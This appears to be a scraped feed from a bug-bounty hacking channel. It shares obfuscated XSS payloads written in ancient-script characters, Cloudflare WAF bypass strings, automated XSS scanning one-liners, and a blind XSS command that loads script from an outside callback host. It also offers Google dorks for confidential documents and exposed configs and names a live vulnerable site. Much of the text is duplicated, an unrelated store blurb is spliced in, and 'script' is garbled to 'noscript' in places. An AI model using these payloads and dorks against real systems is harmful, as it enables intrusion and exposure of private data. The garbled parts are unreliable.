XSS Tip: If alert() is being converted to ALERT() and you can use Like
onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
👍21🔥3❤2
Payload for XSS + SQLi + SSTI/CSTI !
'"><noscript/onload=prompt(5);>{{7*7}}
'"><noscript/onload=prompt(5);>{{7*7}}
❤11👎2👍1
XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
🔥3❤2👍1
Blind XSS In X-Forwarded-For Header
subfinder -d http://target.com | gau | bxss -payload '"><noscript src=https://hacker.xss.ht></noscript>' -header "X-Forwarded-For"
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
👍3❤2
🫡Automate Your XSS
#!/bin/bash read TARGET
subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt
cat waybackurls.txt | dalfox pipe
👍2
New XSS Bypass Cloudflare WAF 🧱
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
❤13
New Xss Fly Under Radar Cloudflare Bypass 🧱
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit -Halim
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit -Halim
👍23
📢a XSS payload, Cuneiform-alphabet based !
This payload was on trend back in 2020, but it still works :)
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()
(Cuneiform is a logo-syllabic noscript that was used to write several languages of the Ancient Near East. The noscript was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)
Source - Wikipedia
This payload was on trend back in 2020, but it still works :)
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()
(Cuneiform is a logo-syllabic noscript that was used to write several languages of the Ancient Near East. The noscript was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)
Source - Wikipedia
❤4👍1😁1
Google Dork - Sensitive Docs 📄
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute”
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute”
👍7🔥2
Google Dork - Server Errors ⚡
inurl:"error" | innoscript:"exception" | innoscript:"failure" | innoscript:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
inurl:"error" | innoscript:"exception" | innoscript:"failure" | innoscript:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
👍2
Google Dork - High % keywords 🚀
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
👍3
https://youtu.be/cfs5pWh5jqM?si=pEyqVQ6SctrnzI7C
DM For Live Class Enrollment
https://wa.me/918945971332
DM For Live Class Enrollment
https://wa.me/918945971332
YouTube
Bug Bounty Live Class | Bug Bounty Automation & Recon | Enroll Now https://wa.me/918945971332
In this Live Class I have talked about how to approach a target in automation and manual way. Usage of the automation in large scope and how to focus on single website for manual pentesting. Have talked about tools like nuclei, gau, httpx, anew, secretfinder…
❤2👍1
Dork: Apache Server Leakage
Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Vulnerable Site- https://www.itronot.co.il/server-status
inurl:server-status "apache server status" "cpu usage"
Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Vulnerable Site- https://www.itronot.co.il/server-status
❤3🔥1
Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members.
Dork: site:*.example.com inurl:login | inurl:signin Google
Dork: site:*.example.com inurl:login | inurl:signin Google
❤9👍2